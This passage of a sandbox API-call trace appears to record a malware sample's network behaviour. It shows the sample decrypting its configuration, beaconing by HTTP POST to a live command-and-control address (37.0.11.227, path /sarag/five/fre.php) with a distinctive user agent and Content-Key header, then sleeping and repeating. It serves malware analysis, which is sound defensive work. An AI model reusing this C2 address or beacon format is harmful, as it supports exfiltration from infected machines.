dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0285.052] GetProcessHeap () returned 0x690000 [0285.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0285.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.054] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0285.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.055] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.059] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.059] GetProcessHeap () returned 0x690000 [0285.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0285.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.061] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0285.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.062] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0285.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.063] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0285.063] GetProcessHeap () returned 0x690000 [0285.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0285.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.064] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.065] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.066] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.067] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.067] GetProcessHeap () returned 0x690000 [0285.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0285.068] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0285.068] GetProcessHeap () returned 0x690000 [0285.068] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0285.068] GetProcessHeap () returned 0x690000 [0285.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0285.069] GetProcessHeap () returned 0x690000 [0285.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0285.069] GetProcessHeap () returned 0x690000 [0285.069] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0285.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.070] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.076] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0285.084] GetProcessHeap () returned 0x690000 [0285.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0285.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.085] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0285.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.087] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.089] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.089] GetProcessHeap () returned 0x690000 [0285.089] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0285.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.091] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0285.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.092] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0285.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.093] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0285.093] GetProcessHeap () returned 0x690000 [0285.093] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0285.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.094] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0285.095] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.095] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0285.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.096] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0285.097] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.097] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0285.097] GetProcessHeap () returned 0x690000 [0285.097] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0285.098] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0285.098] GetProcessHeap () returned 0x690000 [0285.098] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0285.098] socket (af=2, type=1, protocol=6) returned 0x90c [0285.098] connect (s=0x90c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0285.123] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0285.123] GetProcessHeap () returned 0x690000 [0285.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0285.124] GetProcessHeap () returned 0x690000 [0285.124] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0285.125] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0285.127] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0285.127] GetProcessHeap () returned 0x690000 [0285.127] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0285.127] GetProcessHeap () returned 0x690000 [0285.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0285.127] GetProcessHeap () returned 0x690000 [0285.127] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0285.127] GetProcessHeap () returned 0x690000 [0285.128] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0285.128] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0285.129] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0285.129] GetProcessHeap () returned 0x690000 [0285.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0285.129] GetProcessHeap () returned 0x690000 [0285.129] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0285.129] send (s=0x90c, buf=0x6ad508*, len=242, flags=0) returned 242 [0285.131] send (s=0x90c, buf=0x6aba40*, len=159, flags=0) returned 159 [0285.131] GetProcessHeap () returned 0x690000 [0285.131] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0285.131] recv (in: s=0x90c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0285.215] GetProcessHeap () returned 0x690000 [0285.215] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0285.215] GetProcessHeap () returned 0x690000 [0285.215] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0285.215] GetProcessHeap () returned 0x690000 [0285.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0285.216] GetProcessHeap () returned 0x690000 [0285.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0285.216] closesocket (s=0x90c) returned 0 [0285.216] GetProcessHeap () returned 0x690000 [0285.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0285.217] GetProcessHeap () returned 0x690000 [0285.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0285.217] GetProcessHeap () returned 0x690000 [0285.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0285.218] GetProcessHeap () returned 0x690000 [0285.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0285.218] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1720) returned 0x90c [0285.222] Sleep (dwMilliseconds=0xea60) [0285.224] GetProcessHeap () returned 0x690000 [0285.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0285.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.226] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.234] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0285.243] GetProcessHeap () returned 0x690000 [0285.243] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0285.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.244] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0285.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.245] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.246] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.246] GetProcessHeap () returned 0x690000 [0285.247] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0285.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.248] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0285.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.249] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0285.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.251] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0285.251] GetProcessHeap () returned 0x690000 [0285.251] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0285.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.266] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.267] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.269] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.271] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.271] GetProcessHeap () returned 0x690000 [0285.271] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0285.271] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0285.272] GetProcessHeap () returned 0x690000 [0285.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0285.272] GetProcessHeap () returned 0x690000 [0285.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0285.273] GetProcessHeap () returned 0x690000 [0285.273] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0285.273] GetProcessHeap () returned 0x690000 [0285.273] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0285.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.277] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.282] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0285.287] GetProcessHeap () returned 0x690000 [0285.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0285.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.288] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0285.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.289] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.290] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.290] GetProcessHeap () returned 0x690000 [0285.291] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0285.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.292] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0285.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.293] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0285.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.294] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0285.294] GetProcessHeap () returned 0x690000 [0285.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0285.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.295] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0285.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.296] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0285.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.297] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0285.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.298] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0285.298] GetProcessHeap () returned 0x690000 [0285.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0285.298] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0285.298] GetProcessHeap () returned 0x690000 [0285.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0285.298] socket (af=2, type=1, protocol=6) returned 0x910 [0285.298] connect (s=0x910, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0285.323] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0285.323] GetProcessHeap () returned 0x690000 [0285.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0285.323] GetProcessHeap () returned 0x690000 [0285.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0285.324] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0285.324] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0285.324] GetProcessHeap () returned 0x690000 [0285.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afb00 [0285.324] GetProcessHeap () returned 0x690000 [0285.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0285.325] GetProcessHeap () returned 0x690000 [0285.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0285.325] GetProcessHeap () returned 0x690000 [0285.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0285.326] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0285.326] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0285.326] GetProcessHeap () returned 0x690000 [0285.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0285.326] GetProcessHeap () returned 0x690000 [0285.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0285.327] send (s=0x910, buf=0x6ad508*, len=242, flags=0) returned 242 [0285.327] send (s=0x910, buf=0x6aba40*, len=159, flags=0) returned 159 [0285.328] GetProcessHeap () returned 0x690000 [0285.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0285.328] recv (in: s=0x910, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0285.400] GetProcessHeap () returned 0x690000 [0285.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0285.401] GetProcessHeap () returned 0x690000 [0285.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0285.402] GetProcessHeap () returned 0x690000 [0285.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afb00 | out: hHeap=0x690000) returned 1 [0285.402] GetProcessHeap () returned 0x690000 [0285.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0285.403] closesocket (s=0x910) returned 0 [0285.403] GetProcessHeap () returned 0x690000 [0285.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0285.403] GetProcessHeap () returned 0x690000 [0285.403] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0285.404] GetProcessHeap () returned 0x690000 [0285.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0285.404] GetProcessHeap () returned 0x690000 [0285.404] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0285.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1724) returned 0x910 [0285.423] Sleep (dwMilliseconds=0xea60) [0285.424] GetProcessHeap () returned 0x690000 [0285.425] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0285.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.426] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.436] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0285.442] GetProcessHeap () returned 0x690000 [0285.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0285.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.444] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0285.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.444] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.445] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.445] GetProcessHeap () returned 0x690000 [0285.446] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0285.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.447] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0285.447] LoadLibraryW (lpLibFileName="ADVAPI32") 